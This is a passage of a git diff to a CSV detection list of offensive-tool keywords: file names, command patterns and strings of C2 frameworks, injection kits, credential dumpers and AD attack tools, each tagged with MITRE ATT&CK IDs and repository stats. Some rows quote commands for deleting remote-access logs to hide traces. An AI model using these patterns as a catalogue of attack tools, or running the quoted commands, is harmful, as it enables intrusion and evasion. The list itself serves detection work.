TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" "*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -9216,8 +9364,8 @@ "*DeimosC2*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*del *C:\Program Files*\TeamViewer\TeamViewer*_Logfile.log*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*del *C:\Users\*\AppData\Roaming\AnyDesk\connection_trace.txt*","offensive_tool_keyword","malware","observed usage of third-party tools. such as anydesk or teamviewer to access remote hosts. deletion of these logs file is suspicious and could be the actions of intruders hiding their traces","T1070","TA0005","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*deleg_enum_imp*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*Delegation/delegation.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*deleg_enum_imp*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*Delegation/delegation.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*delegation_constrained_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*delegation_constrained_w_protocol_transition_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*delegation_rbcd_objects.txt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","0","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" @@ -9231,32 +9379,32 @@ "*demo-controller.exe *","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*Dendrobate-master*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*dendron*FileMonInject.dll*","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","1","N/A","10","2","122","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" -"*deploycaptureserver.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","439","67","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" -"*DeployPrinterNightmare.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" -"*DesertNut.csproj*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*DesertNut.exe*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*DesertNut.sln*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" -"*DesertNut_h.cs*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1069","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*deploycaptureserver.ps1*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*DeployPrinterNightmare.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*DesertNut.csproj*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*DesertNut.exe*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*DesertNut.sln*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*DesertNut_h.cs*","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*-destPipe * -pipeHost * -bindPort *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" -"*details-c80a6994018b23dc.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*details-c80a6994018b23dc.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*detect ntdll.dll*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*detect-hooksx64.*","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","138","28","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" -"*df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*df64a3f4eb1348cba026ff85a86f39e11a979ce50a4b4af0b9cbd2acdfc90bf0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*dfscoerce.py -d *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*dfscoerce.py*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" -"*dfscoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*dfscoerce_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*DFSCoerce-main*","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","10","7","635","78","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z" "*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*dhcp6.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"*dhcp6.spoof.*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "*Dialupass.exe*","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Dialupass.zip*","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dicts*generic-usernames.txt*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Information Gathering","https://www.spiderfoot.net/","1","0","N/A","6","10","N/A","N/A","N/A","N/A" -"*dicts/ftp_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*dicts/ssh_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*dicts/ssh_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" -"*diego-treitos/linux-smart-enumeration*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*dicts/ftp_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*dicts/ssh_default.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*dicts/ssh_pswd.txt*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*diego-treitos/linux-smart-enumeration*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" "*dinjector /i:* /p:*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*DInjector.csproj*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10","","N/A","","","" "*DInjector.Detonator*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" @@ -9273,14 +9421,14 @@ "*dircreate2system.sln*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*dircreate2system.vcxproj*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*DirCreate2System-main*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" -"*Direct_Syscalls_Create_Thread.c*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" -"*Direct_Syscalls_Create_Thread.exe*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" -"*Direct_Syscalls_Create_Thread.sln*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" -"*Direct_Syscalls_Create_Thread.vcxproj*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","67","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.c*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.exe*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense 